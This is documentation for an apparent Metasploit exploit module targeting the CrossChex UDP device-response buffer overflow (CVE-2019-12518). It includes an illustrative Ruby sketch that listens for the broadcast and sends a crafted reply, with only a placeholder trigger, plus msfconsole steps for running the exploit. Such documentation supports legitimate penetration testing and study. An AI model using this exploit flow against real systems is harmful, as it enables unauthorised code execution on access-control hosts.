Path: blob/master/documentation/modules/exploit/windows/misc/crosschex_device_bof.md
Introduction
CrossChex is a personnel identity verification, access control and time attendance management system for Windows 7, 8 and 10. It uses UDP broadcasts to discover and connect to access control devices on the local network. The code that handles a device's response to that broadcast contains a stack buffer overflow, tracked as CVE-2019-12518, which affects CrossChex Standard x86 <= V4.3.12 and allows arbitrary code execution.
Both the bytes that overflow the stack buffer and the code the attacker wants executed are delivered in a single UDP packet sent as the response to the CrossChex broadcast. Because the exploit and the payload must share one datagram, the whole response is limited to 8947 bytes.
This module exploits CVE-2019-12518 by listening for a CrossChex "new device" broadcast for TIMEOUT seconds, then replying with a UDP packet that carries both the overflow trigger and the attacker's chosen payload. The module's payload Space value is set so that a payload too large for the room left in the packet cannot be selected. If no broadcast is seen within TIMEOUT seconds, the module exits with a warning.
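To make the packet constraints concrete, the following Ruby sketch is an added example of the exchange the module performs, written for this page; it is not the Metasploit module's own code. The overflow_prefix blob, its 256-byte length and all function names are assumptions for illustration: the real trigger bytes, offsets and return address live in the module and are not given here. The 8947-byte limit, the 5050 source port and the wait-then-reply-or-warn behaviour come from the description above.

```ruby
require 'socket'

# Largest UDP response CrossChex will accept (from the module documentation).
# The overflow trigger and the payload must both fit in this one datagram.
MAX_RESPONSE = 8947

# Port CrossChex expects the device reply to come from (module default CPORT).
CROSSCHEX_PORT = 5050

# HYPOTHETICAL placeholder for the part of the datagram that triggers the
# overflow. The real offsets and return address are in the Metasploit module,
# not on this page, so this is just an opaque fixed-length blob.
def overflow_prefix(length = 256)
  'A' * length
end

# Bytes left for the payload once the trigger is in place. This is the
# number the module's payload Space value has to reflect.
def payload_space(prefix)
  MAX_RESPONSE - prefix.bytesize
end

# Assemble the single UDP datagram: trigger first, payload right after.
# Refuses to build anything over the limit rather than silently truncating.
def build_response(prefix, payload)
  total = prefix.bytesize + payload.bytesize
  if total > MAX_RESPONSE
    raise ArgumentError,
          "response is #{total} bytes, limit is #{MAX_RESPONSE} " \
          "(payload space with this prefix: #{payload_space(prefix)})"
  end
  prefix.b + payload.b
end

# Wait up to `timeout` seconds for a datagram on `sock` (already bound to the
# port CrossChex broadcasts to). Returns [data, sender_addrinfo], or nil when
# nothing arrives, which is where the module prints its warning and exits.
def wait_for_broadcast(sock, timeout)
  ready, = IO.select([sock], nil, nil, timeout)
  return nil unless ready
  data, addr = sock.recvfrom(65_535)
  [data, addr]
end

# Send the crafted reply from CPORT (5050 by default) on CHOST back to the
# host and port that sent the broadcast.
def respond_from_cport(dest_host, dest_port, packet,
                       chost: '0.0.0.0', cport: CROSSCHEX_PORT)
  reply = UDPSocket.new
  reply.setsockopt(Socket::SOL_SOCKET, Socket::SO_REUSEADDR, true)
  reply.bind(chost, cport)
  reply.send(packet, 0, dest_host, dest_port)
ensure
  reply&.close
end

# Walk-through on constructed input: a 256-byte trigger leaves 8691 bytes for
# the payload; a payload of exactly that size fits, one byte more is rejected.
def size_check_demo
  prefix = overflow_prefix(256)
  fits = build_response(prefix, "\x90".b * payload_space(prefix)).bytesize
  rejected = begin
    build_response(prefix, "\x90".b * (payload_space(prefix) + 1))
    false
  rescue ArgumentError
    true
  end
  { space: payload_space(prefix), fits: fits, rejected_oversize: rejected }
end
```

A full run would bind a UDPSocket to the port CrossChex broadcasts on, call wait_for_broadcast with the TIMEOUT value, and on success pass the sender's address and port to respond_from_cport together with the datagram from build_response. The size check in build_response is the point of the example: whatever payload is chosen, the trigger plus payload must stay within the single-datagram limit or the vulnerable handler never sees the bytes it is expected to overflow on.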
Verification Steps
- Start msfconsole
- use windows/misc/crosschex_device_bof
- set LHOST vboxnet0
- run
- Open CrossChex
- Navigate to Device > Add
- Select Search
- Verify the payload executes correctly
Options
- TIMEOUT. Seconds the module waits for the broadcast. Defaults to 1000.
- CHOST. Address the UDP response is sent from. Defaults to 0.0.0.0.
- CPORT. Port the UDP response is sent from. Defaults to 5050, as CrossChex expects the device reply to come from this port.
Compatible Payloads
Any basic x86 Windows payload that fits within the module's Space limit.
Payload Options
As above.